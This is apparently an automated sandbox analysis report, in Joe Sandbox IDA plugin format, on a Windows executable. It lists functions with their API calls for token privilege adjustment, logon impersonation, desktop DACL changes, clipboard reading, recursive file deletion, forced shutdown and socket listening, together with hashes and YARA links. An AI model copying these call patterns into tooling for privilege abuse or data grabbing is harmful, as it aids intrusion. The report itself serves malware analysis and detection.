Part of subcall function 007716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077170D
Part of subcall function 007716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0077173A
Part of subcall function 007716C3: GetLastError.KERNEL32 ref: 0077174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00771286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007712A8
CloseHandle.KERNEL32(?), ref: 007712B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007712D1
GetProcessWindowStation.USER32 ref: 007712EA
SetProcessWindowStation.USER32(00000000), ref: 007712F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00771310

Part of subcall function 007710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007711FC), ref: 007710D4
Part of subcall function 007710BF: CloseHandle.KERNEL32(?,?,007711FC), ref: 007710E9

Strings

Z}, xrefs: 00771392
, xrefs: 0077125A
winsta0, xrefs: 007712CC
default, xrefs: 0077130B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z}
API String ID: 22674027-3716028957
Opcode ID: d916bdfecdf4bc84655219d34e19bdda55d8c924d91e9b12d9161311f34a5c08
Instruction ID: d3b4d6251fc08764519caa10097faab7ddcc3c74bb6bbace1a1b9e2037359d67
Opcode Fuzzy Hash: d916bdfecdf4bc84655219d34e19bdda55d8c924d91e9b12d9161311f34a5c08
Instruction Fuzzy Hash: 1581AB71A00248BFDF218FA8DC49FEE7BB9EF45744F14C129F918A62A0D7388944CB65

Function 00770B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00771114
Part of subcall function 007710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771120
Part of subcall function 007710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 0077112F
Part of subcall function 007710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771136
Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0077114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00770BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00770C00
GetLengthSid.ADVAPI32(?), ref: 00770C17
GetAce.ADVAPI32(?,00000000,?), ref: 00770C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00770C6D
GetLengthSid.ADVAPI32(?), ref: 00770C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00770C8C
HeapAlloc.KERNEL32(00000000), ref: 00770C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00770CB4
CopySid.ADVAPI32(00000000), ref: 00770CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00770CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00770D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00770D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770D45
HeapFree.KERNEL32(00000000), ref: 00770D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770D55
HeapFree.KERNEL32(00000000), ref: 00770D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770D65
HeapFree.KERNEL32(00000000), ref: 00770D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00770D78
HeapFree.KERNEL32(00000000), ref: 00770D7F

Part of subcall function 00771193: GetProcessHeap.KERNEL32(00000008,00770BB1,?,00000000,?,00770BB1,?), ref: 007711A1
Part of subcall function 00771193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00770BB1,?), ref: 007711A8
Part of subcall function 00771193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00770BB1,?), ref: 007711B7

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 28f3d4fc6f9c1a95f6163a31f2b6b251e1c4e60423151022542d778f4d71e806
Instruction ID: a79a72d81b488964055420e2883e5a6b6d4bd599990f97b037976d16129a087d
Opcode Fuzzy Hash: 28f3d4fc6f9c1a95f6163a31f2b6b251e1c4e60423151022542d778f4d71e806
Instruction Fuzzy Hash: 12715C71A0020AFBDF11DFA4DC49BEEBBB8BF45340F048515E919A6291D779A905CFA0

Function 0078EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(007ACC08), ref: 0078EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0078EB37
GetClipboardData.USER32(0000000D), ref: 0078EB43
CloseClipboard.USER32 ref: 0078EB4F
GlobalLock.KERNEL32(00000000), ref: 0078EB87
CloseClipboard.USER32 ref: 0078EB91
GlobalUnlock.KERNEL32(00000000), ref: 0078EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0078EBC9
GetClipboardData.USER32(00000001), ref: 0078EBD1
GlobalLock.KERNEL32(00000000), ref: 0078EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0078EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0078EC38
GetClipboardData.USER32(0000000F), ref: 0078EC44
GlobalLock.KERNEL32(00000000), ref: 0078EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0078EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0078EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0078ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0078ECF3
CountClipboardFormats.USER32 ref: 0078ED14
CloseClipboard.USER32 ref: 0078ED59

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 0bab003d0e0320b9390f0a55d49cbc6ea106e04e9e5cf06a8ebadb4c11ce8279
Instruction ID: 7ff2d144c836c6dbad879efa604d19d99da0c70b2948f4a286ddd7a8435cb60c
Opcode Fuzzy Hash: 0bab003d0e0320b9390f0a55d49cbc6ea106e04e9e5cf06a8ebadb4c11ce8279
Instruction Fuzzy Hash: 2661EF74244201EFD301EF24C889F6ABBE4AF85714F088519F456872E2DB39ED4ACB62

Function 0078698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007869BE
FindClose.KERNEL32(00000000), ref: 00786A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00786A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00786A75

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00786AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00786ADF

Strings

%03d, xrefs: 00786DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00786B32
%4d, xrefs: 00786BB1
%02d, xrefs: 00786C00, 00786C0A, 00786C5A, 00786CAA, 00786CFA, 00786D4A
%4d%02d%02d%02d%02d%02d, xrefs: 00786B6A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: cf8b748459957dd9c0c86c75dfef3e44e39371ed1415dfe65c921c299ee27914
Instruction ID: 7ffda116ebeb2cbccff88cbb81b9775a738d55b85e881619ee921dade9aafed1
Opcode Fuzzy Hash: cf8b748459957dd9c0c86c75dfef3e44e39371ed1415dfe65c921c299ee27914
Instruction Fuzzy Hash: D8D15FB2508340AFC314EBA4D896EABB7FCAF88704F04491DF585D7191EB78DA45CB62

Function 00789642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00789663
GetFileAttributesW.KERNEL32(?), ref: 007896A1
SetFileAttributesW.KERNEL32(?,?), ref: 007896BB
FindNextFileW.KERNEL32(00000000,?), ref: 007896D3
FindClose.KERNEL32(00000000), ref: 007896DE
FindFirstFileW.KERNEL32(*.*,?), ref: 007896FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0078974A
SetCurrentDirectoryW.KERNEL32(007D6B7C), ref: 00789768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00789772
FindClose.KERNEL32(00000000), ref: 0078977F
FindClose.KERNEL32(00000000), ref: 0078978F

Strings

*.*, xrefs: 007896F5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 93c6126d0f99e7c40292689ab43ee0ee243e72afea715aac616d014d1b76eb01
Instruction ID: 858c53429e59d10ad98046e1903c59807454d7089f3e72114eb0827220df6c2d
Opcode Fuzzy Hash: 93c6126d0f99e7c40292689ab43ee0ee243e72afea715aac616d014d1b76eb01
Instruction Fuzzy Hash: 6831D5726802197EDF11AFB4DC08AEE77ACAF4A320F188156F905E2190EB3CDE408B54

Function 0078979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007897BE
FindNextFileW.KERNEL32(00000000,?), ref: 00789819
FindClose.KERNEL32(00000000), ref: 00789824
FindFirstFileW.KERNEL32(*.*,?), ref: 00789840
SetCurrentDirectoryW.KERNEL32(?), ref: 00789890
SetCurrentDirectoryW.KERNEL32(007D6B7C), ref: 007898AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 007898B8
FindClose.KERNEL32(00000000), ref: 007898C5
FindClose.KERNEL32(00000000), ref: 007898D5

Part of subcall function 0077DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0077DB00

Strings

*.*, xrefs: 0078983B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: aed0af55bc730b3888182c04a3562b5680cb5ad48e1b07822a8069f282657d21
Instruction ID: 46cd3f0ec63e8c1e6efcd3a4ce6290e8e6a1d0c281f81b25f855111afa7bb3e6
Opcode Fuzzy Hash: aed0af55bc730b3888182c04a3562b5680cb5ad48e1b07822a8069f282657d21
Instruction Fuzzy Hash: 0C31E57258021ABEEF10AFB4DC48AEE37ACAF46320F188156E950A21D1DB39DD448B64

Function 00788195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00788257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00788267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00788273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00788310
SetCurrentDirectoryW.KERNEL32(?), ref: 00788324
SetCurrentDirectoryW.KERNEL32(?), ref: 00788356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0078838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00788395

Strings

*.*, xrefs: 0078839B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: bd9edf07b6185b93a98b33d185296ee8198aba7e26d99652cedd5496b9697f4b
Instruction ID: 6fba0a85c048567482ed5dcfcfe7098b29670df480dd8df3f8dc156f1a006c0b
Opcode Fuzzy Hash: bd9edf07b6185b93a98b33d185296ee8198aba7e26d99652cedd5496b9697f4b
Instruction Fuzzy Hash: DA617BB25443059FCB10EF64C8449AEB3E9FF89310F44891EF999C7251EB39E945CB92

Function 0077D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2

Part of subcall function 0077E199: GetFileAttributesW.KERNEL32(?,0077CF95), ref: 0077E19A

FindFirstFileW.KERNEL32(?,?), ref: 0077D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0077D1DD
MoveFileW.KERNEL32(?,?), ref: 0077D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0077D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0077D237

Part of subcall function 0077D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0077D21C,?,?), ref: 0077D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0077D253
FindClose.KERNEL32(00000000), ref: 0077D264

Strings

\*.*, xrefs: 0077D0CD, 0077D0D6, 0077D0EB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: a8e463fee453c985c01bfb774e519a2e86619f2aa5eb1a1460c15b6fff81d1c3
Instruction ID: 1f49a11783cd33b1f511c938a3580366ca277e130ce0a6f379f41f4f6855aa5c
Opcode Fuzzy Hash: a8e463fee453c985c01bfb774e519a2e86619f2aa5eb1a1460c15b6fff81d1c3
Instruction Fuzzy Hash: 91618C3180110DEFCF15EBE4C9969EDB7B9AF55340F248065E50A77192EB38AF4ACB60

Function 0078ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0078ED91
EmptyClipboard.USER32 ref: 0078ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0078EDAC
CloseClipboard.USER32 ref: 0078EEA3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 81dc2018dd5b35acd2b2d6e76b076b0457d2b0da4d7cb6fee5e29de10933396b
Instruction ID: b3dc44cb50ab052d5fb7f293f49f538a7bceeae591fce03841f2272534dfe90b
Opcode Fuzzy Hash: 81dc2018dd5b35acd2b2d6e76b076b0457d2b0da4d7cb6fee5e29de10933396b
Instruction Fuzzy Hash: F9418D35244611EFE721EF15D888B59BBE5FF45318F14C099E4158B6A2C739EC42CB94

Function 0077E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077170D
Part of subcall function 007716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0077173A
Part of subcall function 007716C3: GetLastError.KERNEL32 ref: 0077174A

ExitWindowsEx.USER32(?,00000000), ref: 0077E932

Strings

SeShutdownPrivilege, xrefs: 0077E902
, xrefs: 0077E920
, xrefs: 0077E95C
@, xrefs: 0077E925

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 0a0e9755ed3d4f0c1e54f7d341ad550eddc1e42f33232dda7ade74d32f1b6513
Instruction ID: 4ac8a1da5beee408550004aed758433446311a5863956aaee349a67a270a4d24
Opcode Fuzzy Hash: 0a0e9755ed3d4f0c1e54f7d341ad550eddc1e42f33232dda7ade74d32f1b6513
Instruction Fuzzy Hash: D9012B73610210BBEF5426749C89BBB725C97087C4F15C462FA06E21D1D6AC7C408695

Function 00791204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00791276
WSAGetLastError.WSOCK32 ref: 00791283
bind.WSOCK32(00000000,?,00000010), ref: 007912BA
WSAGetLastError.WSOCK32 ref: 007912C5
closesocket.WSOCK32(00000000), ref: 007912F4
listen.WSOCK32(00000000,00000005), ref: 00791303
WSAGetLastError.WSOCK32 ref: 0079130D
closesocket.WSOCK32(00000000), ref: 0079133C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 47335f9a358128dab459d3b5408c19b90a1a5232dfa1c3e9869a847cd8a3357d
Instruction ID: f581364c2dc70ccfe56072e5df8c08002543a07f46a255e19c6a8cca276a01d1
Opcode Fuzzy Hash: 47335f9a358128dab459d3b5408c19b90a1a5232dfa1c3e9869a847cd8a3357d
Instruction Fuzzy Hash: 6F418431600101AFDB10EF68D488B69BBE6BF86314F58C198D8569F2D2C779ED81CBE1

Function 0074B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0074B9D4
_free.LIBCMT ref: 0074B9F8
_free.LIBCMT ref: 0074BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007B3700), ref: 0074BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,007E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0074BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,007E1270,000000FF,?,0000003F,00000000,?), ref: 0074BC36
_free.LIBCMT ref: 0074BD4B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: baed38c1295b14245252ff145fb3e7ccd5e0d8c9bce136aeffc2de196ea8a039
Instruction ID: 086a74d2097ddd68e8e7b89f7d373dba962e423273e7d17aad71218db7656871
Opcode Fuzzy Hash: baed38c1295b14245252ff145fb3e7ccd5e0d8c9bce136aeffc2de196ea8a039
Instruction Fuzzy Hash: 38C15671A04244EFDB209F79CC85BAE7BB9EF45310F18819AE590DB252E738DE42CB50

Function 0077D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2

Part of subcall function 0077E199: GetFileAttributesW.KERNEL32(?,0077CF95), ref: 0077E19A

FindFirstFileW.KERNEL32(?,?), ref: 0077D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0077D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0077D481
FindClose.KERNEL32(00000000), ref: 0077D498
FindClose.KERNEL32(00000000), ref: 0077D4A1

Strings

\*.*, xrefs: 0077D3F2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: ae3cdb34a0ea8de410d6d159b06d385f14aa5b4f4d825e10a3e5ae52c111b634
Instruction ID: 48e10a85b0e9c74252726a5ea6374990367a8fd1cd3b0c1da4c5a09b27049853
Opcode Fuzzy Hash: ae3cdb34a0ea8de410d6d159b06d385f14aa5b4f4d825e10a3e5ae52c111b634
Instruction Fuzzy Hash: 2D318171008381ABC711EF64C8558EFB7B8BE91350F44891DF4D5521D1EB28AE49C767

Function 0074E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0074E645

Strings

1#QNAN, xrefs: 0074F84B
1#INF, xrefs: 0074F852
1#SNAN, xrefs: 0074F844
1#IND, xrefs: 0074F83D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
